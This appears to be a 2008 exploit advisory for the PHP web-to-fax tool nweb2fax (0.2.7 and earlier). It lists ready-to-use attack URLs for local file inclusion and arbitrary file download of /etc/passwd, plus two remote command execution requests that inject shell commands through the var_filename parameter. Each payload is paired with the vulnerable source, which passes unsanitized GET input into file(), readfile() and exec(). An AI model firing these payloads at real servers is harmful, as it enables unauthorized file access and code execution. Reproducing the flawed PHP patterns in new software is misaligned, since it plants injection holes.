[ Discovered by dun \ dun[at]strcpy.pl ] ################################################################## # [ nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities ] # ################################################################## # # Script site: http://sourceforge.net/projects/nweb2fax/ # # [ Local File Inclusion Vulnerability ]: # *** /comm.php?id=../../../../../../../../../../etc/passwd # # Bug: # # ... # $var_id=$_GET['id']; # $fileary = file ( "$DIR_SPOOL/log/c$var_id" ); # reset($fileary); # foreach ($fileary as $line) { # if( trim($line) != "" ){ # print "<br>$line"; # } # } # ... # # # [ Arbitrary File Download Vulnerability ]: # *** /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd # # Bug: # # ... # $var_filename=$_GET['var_filename']; # $var_format=$_GET['format']; # ... # if( $var_format == "ps" ) { # $filename = "$DIR_SPOOL/$var_filename"; # header("Content-Type: application/postscript"); # header('Content-Disposition: attachment; filename="downloaded.ps"'); # readfile("$filename"); # ... # # # [ Remote Command Execution 1]: # *** /viewrq.php?format=tif&var_filename=;id%3E/tmp/id.txt;chmod% 20777%20/tmp/id.txt; # # Bug: # ... # $var_filename=$_GET['var_filename']; # $var_format=$_GET['format']; # ... # } elseif ($var_format == "pdf") { # ... # $recvq_filename = "$DIR_SPOOL/$var_filename"; # ... # exec("$PROG_TIFF2PS -a -O $FILE_TMP1 $recvq_filename",$exec_output, $exec_return); # ... # # # [ Remote Command Execution 2]: # *** /viewrq.php?format=pdf&var_filename=;id%3E/tmp/id2.txt;chmod% 20777%20/tmp/id2.txt;id # # Bug: # ... # $var_filename=$_GET['var_filename']; # $var_format=$_GET['format']; # ... # } elseif ($var_format == "pdf") { # ... # $recvq_filename = "$DIR_SPOOL/$var_filename"; # ... # $cmd="$PROG_CAT $recvq_filename | $PROG_GS $gs_options"; # ... # exec($cmd,$exec_output,$exec_return); # ... # # ############################################### # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz.. ############################################### [ dun / 2008 ]